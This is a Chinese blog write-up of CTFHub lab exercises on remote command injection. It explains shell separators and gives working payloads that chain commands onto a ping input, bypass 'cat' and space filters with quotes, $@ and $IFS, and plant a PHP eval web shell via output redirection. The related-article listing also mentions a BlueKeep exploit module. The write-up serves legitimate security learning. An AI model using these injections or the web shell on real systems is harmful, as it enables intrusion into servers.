CTFHub技能树笔记之RCE:命令注入、过滤cat、过滤空格

已于 2022-03-28 19:04:41 修改
阅读量8.5k 收藏 58
点赞数 11
分类专栏: RCE CTF 文章标签: web安全
于 2022-03-28 19:03:53 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48799157/article/details/123800145
版权
CTF 同时被 2 个专栏收录
16 篇文章 6 订阅
订阅专栏
RCE
3 篇文章 1 订阅
订阅专栏

小白一个,记录解题过程,如有错误请指正!

一、命令注入

补充知识点:

        命令行注入漏洞是指web应用程序中调用了系统可执行命令的函数,而且输入参数是可控的,如果黑客拼接了注入命令,就可以进行非法操作了。

Windows系统支持的管道符如下:

1. “|”:直接执行后面的语句。
2. “||”:如果前面的语句执行失败,则执行后面的语句,前面的语句只能为假才行。
3. “&”:两条命令都执行,如果前面的语句为假则直接执行后面的语句,前面的语句可真可假。
4. “&&”:如果前面的语句为假则直接出错,也不执行后面的语句,前面的语句为真则两条命令都执行,前面的语句只能为真。

Linux系统支持的管道符如下:

1. “;”:执行完前面的语句再执行后面的语句。
2. “|”:显示后面语句的执行结果。
3. “||”:当前面的语句执行出错时,执行后面的语句。
4. “&”:两条命令都执行,如果前面的语句为假则执行执行后面的语句,前面的语句可真可假。
5. “&&”:如果前面的语句为假则直接出错,也不执行后面的语句,前面的语句为真则两条命令都执行,前面的语句只能为真。

解法一:

1.查看当前目录,发现有另一个页面,当时没太注意

 2.查看根目录,发现并没有flag,反应过来flag可能在238442225211085.php

 
3.查看238442225211085.php,并没有回显

​
127.0.0.1; cat 238442225211085.php
​

查了一下,可能是字符编码显示不出来,用base64加密形式显示

127.0.0.1; cat 238442225211085.php |base64

解法二:

补充知识点:

        输出重定向:

 1.我们可以用重定向的方法注入一个一句话木马:

127.0.0.1&echo -e "<?php @eval(\$_POST['test']);?>" > shell.php

 2.用蚁剑连接即可

二、过滤cat

1.查看当前目录

2.根据题目可以知道cat被过滤了,并不能简单的得到flag

3.使用单引号绕过 

127.0.0.1; c''at flag_2287214057241.php |base64

4.使用双引号绕过 

127.0.0.1; c""at flag_2287214057241.php |base64

5.利用Shell 特殊变量绕过

127.0.0.1; ca$@t flag_2287214057241.php|base64

 三、过滤空格

1.先看当前目录

2.根据题目可以知道空格被过滤掉了 

 3.空格可以用以下字符代替:
< 、<>、%20(space)、%09(tab)、$IFS$9、 ${IFS}、$IFS

$IFS在linux下表示分隔符,但是如果单纯的cat$IFS2,bash解释器会把整个IFS2当做变量名,所以导致输不出来结果,因此这里加一个{}就固定了变量名。
同理,在后面加个$可以起到截断的作用,使用$9是因为它是当前系统shell进程的第九个参数的持有者,它始终为空字符串。

以下payload皆可绕过本题空格:

127.0.0.1;cat<flag_2057057213623.php|base64
127.0.0.1;cat$IFS$9flag_2057057213623.php|base64
127.0.0.1;cat${IFS}flag_2057057213623.php|base64

参考文章:

https://www.cnblogs.com/0yst3r-2046/p/12600073.html

https://www.runoob.com/linux/linux-shell-io-redirections.html

https://blog.csdn.net/Manuffer/article/details/120672448

weixin_48799157
关注
  • 11
    点赞
  • 58
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
ctf+任意命令执行RCE+常见系统命令+web安全
10-08
ctf+RCE+常见系统命令+web安全
cve_2019_0708_bluekeep_rce:蓝皮漏洞利用
04-29
cve_2019_0708_bluekeep_rce.rb 添加 /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb rdp.rb 替换 /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb ...
CTF-命令注入【超详细】
不知名白帽的博客
09-05 9151
CTF-命令注入【超详细】
来自红队大佬的经验之谈---命令执行过滤绕过-Windows篇
weixin_48421613的博客
06-17 418
感谢来自老流氓大佬的投稿,本次文章介绍的是在windows环境下,过滤的“点”和“空格”等符号,如何利用windowsit特性进行绕过
CTFHub技能树笔记RCE过滤目录分隔符、过滤运算符、综合过滤练习
weixin_48799157的博客
03-29 2572
小白一个,记录解题过程,如有错误请指正! 一、过滤目录分隔符 1.查看当前目录 2.有提示,进去看一下 127.0.0.1;ls flag_is_here 3.根据经验知道我们只要访问到php文件的内容就可以拿到flag了 思路:这里我们可以用&&运算符将命令连接起来就能成功拿到flag 127.0.0.1;cd flag_is_here&&cat flag_19900138617064.php|base64 二、过...
CTFHub技能书解题笔记-RCE-过滤空格过滤目录分隔符、过滤运算符
qq_43006864的博客
04-01 3884
一、过滤空格 过滤空格。 引入绕过空格过滤的字符:< 、<>、%20(space)、%09(tab)、$IFS$9、 ${IFS}、$IFS等 直接开始解题 这里就用<来绕过。flag还是再界面源码。 二、过滤目录分隔符 题目提示,这次过滤了目录分割符 / ,你能读到 flag 目录下的 flag 文件吗。 这里的话就更简单了,我们可以使用;和cd到目录然后使用cat抓取。也就是用;进行命令拼接。例如:x.x.x.x;cd ../;ls;cat xxx
CTFHub技能书解题笔记-RCE-综合过滤练习
qq_43006864的博客
04-06 3010
直接开题,综合过滤。提示我们:同时过滤了前面几个小节的内容, 如何打出漂亮的组合拳呢? 估计也是直接给了源码。直接打开链接,看到他过滤了,空格、/、\&、cat flag一堆。 这里我们慢慢绕过吧。一层层过。 首先,还是查看文件,LS他没过滤,但是过滤了;号,这里得找个替代,通过查url编码表发现%0a可以实现换行。 进行利用,发现;可以通过%0a代替 ls执行成功,看到了flag的位置,这里cat过滤,可以使用nl之类的代替,通过查大佬们的wp和资...
CTFHUB技能树(全详细解析含进阶)
热门推荐
hxhxhxhxx的博客
01-17 3万+
HTTP协议 请求树 根据提示直接修改头即可 302跳转 直接重放获得302跳转, Cookie 字面意思, 基础认证 简介: 在HTTP中,基本认证(英语:Basic access authentication)是允许http用户代理(如:网页浏览器)在请求时,提供 用户名 和 密码 的一种方式。详情请查看 https://zh.wikipedia.org/wiki/HTTP基本认证 附件提供了密码,很明显就是爆破 有了用户名,而且发现一个base加密的东西 解密看看 固定格式啊,
CTFHUB技能树Web
ScyLamb的博客
12-28 2668
web web前置技能 参考链接 -操作系统 -数据库 -HTML/CSS -程序语言 HTTP协议 0x01 请求方式 1)HTTP Method 是可以自定义的,并且区分大小写 可以通过抓包更改其HTTP的方法 2)kali系统中的curl命令实现抓包(curl支持几乎所有操作系统) 常用命令:-v是详细信息 -X是指定请求方法 curl参考一 curl参考二 0x02 302跳转 关于302的题: burpsite默认不重定向 使用curl命令,该命令中只有加了**-L**才重定向 相
ctfhubrce 通关笔记
2301_80489197的博客
04-18 250
这里进行了对cat过滤,通过preg_match_all()函数在变量ip和m中搜索“cat”字符串,如果里面没有“cat”字符串,则会进行ping命令。这一关将||和&给过滤了,但是还可以用其他没有被过滤的运算符进行拼接。通过反斜杠‘\’或者单引号进行绕过,也可以用tac命令来反向输出。先用ls查看一下当前目录下有那些文件,看到flag,去看一下。可以看到这一关是没有任何过滤的,所以可以直接用‘|’进行拼接。ping完后页面上什么也没有,但是在源码中可以看到flag。看到flag,再去看一下。
ctfhub技能树RCE部分(待完善)
qq_39670065的博客
11-09 578
eval执行 eval执行就是远程代码执行 看看代码 <?php if (isset($_REQUEST['cmd'])) { eval($_REQUEST["cmd"]); } else { highlight_file(__FILE__); } ?> 连上蚁剑 连上会发现这是一个Linux系统,要使用简单的Linux命令 ls 列出目录中的文件 cd 选择要进入的目录 cd / 返回到根目录 cat 查看文件 更多命令见linux常用命令学习 再次温馨提示:学习.
CTFHUB RCE作业
I_WORM的博客
04-17 676
注意:%09是在url框中修改的,而不是直接在输入框中输入,因为这是url编码,如果在ip输入框中输入会进行二次url编码,%09为tab键的url编码,无法直接输入。构造payload:ip=127.0.0.1%0acd%09fl\ag_is_here%0atac%09fla\g_210412363721473.php#首先到flag_is_here文件目录下,然后读取flag_8317178653643.php文件内容。构造payload:127.0.0.1|ls flag_is_here。
Struts2-RCE:Burp Extender用于检查struts 2 RCE漏洞
04-15
Struts2-RCE 一个Burp Extender,用于检查struts 2 RCE漏洞。描述此burp扩展有助于识别struts2 Web应用程序中的Struts2远程代码执行漏洞。 此Burp扩展程序检测以下18个RCE,它们是S2-001 S2-007 S2-008 S2-012 S2-...
redis-rce:Redis RCE 的几种方法
04-15
如果客户端应用没有对用户输入进行严格的过滤和验证,攻击者可以构造恶意输入,注入恶意 Lua 代码,实现远程代码执行。例如,通过构造含有 `redis.call('system', 'cmd')` 的 Lua 脚本,执行任意系统命令。 三、...
xalanjava源码-Jackson-RCE:杰克逊-RCE
06-05
xalan java源码我们在证明什么 Jackson 数据绑定反序列化漏洞 应用环境 基于Spark框架的微服务() 取决于 ...夏兰:夏兰:2.7.2 ...上面的命令在attackscripts目录中创建attack.json cd 攻击脚本 ./add.sh ./l
网络安全等级保护制度1.0与2.0的演进与变革
最新发布
gmqqcsdn的博客
07-23 760
等保1.0是我国在网络安全领域迈出的重要一步,它于2008年正式发布。该版本的等保制度以《信息安全技术 信息系统安全等级保护基本要求》为核心标准,主要聚焦于信息系统的物理安全、网络安全、主机安全、应用安全和数据安全等方面的基础防护。等保1.0的实施对于提高我国信息系统的安全防护水平起到了积极的推动作用,但随着网络环境的快速变化和新型威胁的不断出现,等保1.0的局限性也逐渐显现。
ctfhub rce
09-01
你想了解关于 CTFHubRCE(远程命令执行)相关内容吗?CTFHub 是一个针对CTF(Capture The Flag)竞赛的学习平台,而RCE是一种常见的漏洞类型之一。在CTFHub上,你可以学习如何发现和利用RCE漏洞来获取系统权限。这样的技能在网络安全领域特别重要。 请注意,RCE是一种违法行为,在未经授权的情况下进行RCE攻击是被禁止的。在学习过程中,请遵循合法和道德准则,并严禁将所学技术用于非法用途。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值